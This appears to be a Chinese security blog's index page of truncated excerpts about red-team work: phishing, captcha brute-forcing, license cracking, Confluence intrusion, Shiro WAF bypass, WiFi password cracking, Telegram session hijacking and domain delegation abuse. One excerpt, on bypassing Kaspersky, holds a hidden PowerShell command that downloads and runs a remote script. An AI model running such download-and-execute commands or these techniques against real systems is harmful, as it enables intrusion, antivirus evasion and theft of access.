毅种循环

0X01# 接到客户通知，发现疑似一份钓鱼邮件，要求进行研判并且溯源。 邮件大概如下： 0X02# 压缩包更改为 EML 之后打开文件，压缩包内容如下： PS：此处的 index.exe 初始状态为 index.sc，为了方便分析这里改掉了原始后缀。其中最主要的可执行文件为…

0x01# 在项目上遇到了一个登陆口，但是有验证码，同时使用了当前验证码的 UUID 进行鉴权，简单来说就是 如果需要爆破登录接口，需要识别验证码的同时携带上本次验证码的 UUID 同时爆破，接口才能返回信息。 样式如下： 0X02# UUID 同时有时间校验 UUID…

‍ 0x01# 因为最近有反编译微信小程序的需求，用了一个工具发现还不错，但是过了几天弹出了收费需求，感觉验证挺简单的。尝试破解一下。 因为运行之后在主程序上这是一个窗口，我不太懂逆向，根据我能理解的一点知识，我觉得或许能够将这个窗口给 push 掉。 ‍ 0X02# 看到文…

1 摘要# 云渗透测试认证专家（Certified Cloud Penetration Test Professional, CCPTP）认证与培训项目由国际云安全联盟中华区发布，是全球首个针对云环境渗透测试能力的认证课程，旨在提供针对云计算渗透测试所需的专业实操技能…

1# CF 良心的一批！ 访问地址：https://1.1.1.1/ 2# 为什么有这个想法呢，因为 能白嫖不要给钱 有些站点对 ip 限制的比较死，云厂商的 ip 偶尔是白名单，封 ip 比较快，不想被封而已。 发现 cf 给的 ip 还是比较干净的，相当舒服了。 3# 详细设置…

记录一次之前的钓鱼。 之前有个甲方开展演练，不限制攻击手法，正巧一般都是硬打进去的，这次正好写一下钓鱼。 很简单，全是基础的东西，轻喷。 0x01 为什么要钓鱼 正常来说，无论是护网还是高级渗透项目，目标肯定是做了好几轮测试的，要从外围找到点，很难。 但是在允许钓鱼的情况下…

0X01 攻击链路图# 图做的比较密，单独截出几份用于说明选择和目标的方向。 关于供应商的收集 关于供应商的打击链。 关于此次供应商目标的选择。 0x02 入口# 入口很简单，一个 Confluence 的漏洞，直接写入内存马。 系统存在 360 全家桶 系统是…

‍ 这个 shiro 是有 WAF 的，具体的情况就是找得到 key，但是找不到链。 ‍ 当 key 存在但是找不到链，抓包看看请求。 ‍ 我所知的 shiro bypass 思路就从 rememberMe cookie 的长度，还有就是脏数据填充，waf 会解密…

某护网行动，通过企查查收集到了该单位的招投标信息。 通过对该中标公司进行渗透测试，发现在其 IP 段里面存在一个 Confluence，刚好有漏洞的版本，随即拿下。 ‍ 系统为 2008R2，X64 发现有 360 全家桶，权限 nt authority\network service。…

HackTheBox-Nest 信息收集# ‍ Copy └─# nmap -sV 10.129.157.43 -p 1-65535 Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-20 22:27 EST Nmap scan…

‍ 因涉及敏感信息较多，厚码见谅。 最近一段时间有个项目，当时对某个单位目标进行了信息收集，该系统是一个邮件系统。 ‍ 目标：XXX.gov.cn 某个政务级目标 系统：自建的邮件服务系统 ‍ 系统有滑块验证，因此从web爆破邮箱的作用不大，同时…

BypassKarpersky.zip ‍ 0x01 首先CS需要启一个powershell， powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http…

漏洞描述 漏洞描述: 在 F5 BIG-IP 16.1.x 16.1.2.2 之前的版本、15.1.5.1 之前的 15.1.x 版本、14.1.4.6 之前的 14.1.x 版本、13.1.5 之前的 13.1.x 版本以及所有 12.1.x和 11.6.x 版本…

日常测试或攻防演练中像shiro，fastjson等漏洞已经越来越少了，但是随着spring boot框架的广泛使用，spring boot带来的安全问题也越来越多，本文仅介绍未授权现在heapdump获取数据库口令，达到连接数据库的目的。其他spring…

> 本文章仅作为技术学习交流，请不要随意拿邻居开刀。 提前准备 你需要如下材料 - 一个支持监听的无线网卡设备 - 一个强大的WiFi字典 - 一个有WiFi的地方 最近流量不够用了，想着偷个网试试，看了一下周边的WiFi布局。。 还是有一些WIFI设备的…

2018年5月16日，Talos发表了关于Telegrab的一篇文章，介绍了可以劫持Telegram会话的恶意软件。原理非常简单：如果攻击者可以复制桌面用户的会话令牌（session token），那么就能劫持会话。除了本地存储的信息外，攻击者不需要其他任何信息…

项目地址：https://github.com/f0ng/captcha-killer-modified 识别库： https://github.com/sml2h3/ddddocr ‍ 0x01 安装 前置条件：安装dddocr. pip3 install ddddocr…

本篇文章主要是对域渗透中的委派利用手法进行总结。 域委派是指，将域内用户的权限委派给服务账号，使得服务账号能以用户权限开展域内活动。需要注意的是在域内可以委派的账户有两种，一种是 主机账户 ，另一种是 服务账户 (域用户通过注册SPN也可以成为服务账号)。 在域中只有服务账户和主…